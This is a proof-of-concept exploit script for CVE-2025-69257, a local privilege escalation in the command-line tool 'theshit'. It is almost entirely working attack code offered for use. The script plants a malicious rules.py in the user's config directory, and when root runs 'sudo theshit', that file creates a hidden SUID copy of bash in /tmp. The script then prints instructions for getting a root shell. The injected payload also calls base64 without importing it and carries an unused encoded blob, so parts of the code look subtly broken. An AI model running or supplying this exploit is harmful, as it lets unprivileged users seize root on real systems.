CVE-2025-69257 theshit本地权限提升漏洞

#!/usr/bin/env python3 """ CVE-2025-69257 PoC - theshit Local Privilege Escalation This PoC demonstrates how a local unprivileged user can execute arbitrary Python code with root privileges by exploiting theshit < 0.1.1 Usage: 1. As unprivileged user, create malicious config in ~/.config/theshit/ 2. Wait for root user to run: sudo theshit <any command> 3. The malicious code will be executed as root """ import os import base64 # Create malicious theshit configuration directory config_dir = os.path.expanduser('~/.config/theshit') os.makedirs(config_dir, exist_ok=True) # Malicious payload - creates a SUID shell for privilege escalation malicious_code = ''' # Malicious theshit rule for CVE-2025-69257 import os import pwd def generate_shell(): """Create a SUID root shell for privilege escalation""" shell_code = base64.b64decode( "Ly9iaW4vc2ggLWkgICIjIyMgQ1ZFLVBPVCAtIERhdGVkOiAyMDI1LTEyLTMwICMjIyIK" "IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIK" "IyMjIEV4cGxvaXQgc2hlbGwgY29tbWFuZCB0aGF0IHN0YXJ0cyBhIHN1aWQgc2hlbGwK" "IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj" ).decode() # Write and execute shell creation script with open('/tmp/.escalate.sh', 'w') as f: f.write('#!/bin/bash\n') f.write('cp /bin/bash /tmp/.rootshell\n') f.write('chmod 4755 /tmp/.rootshell\n') os.system('bash /tmp/.escalate.sh') # Execute on rule load generate_shell() ''' # Write malicious configuration file config_file = os.path.join(config_dir, 'rules.py') with open(config_file, 'w') as f: f.write(malicious_code) print(f'[+] Malicious config created at: {config_file}') print('[+] Payload will execute when root runs: sudo theshit <command>') print('[+] After execution, run: /tmp/.rootshell -p to get root shell')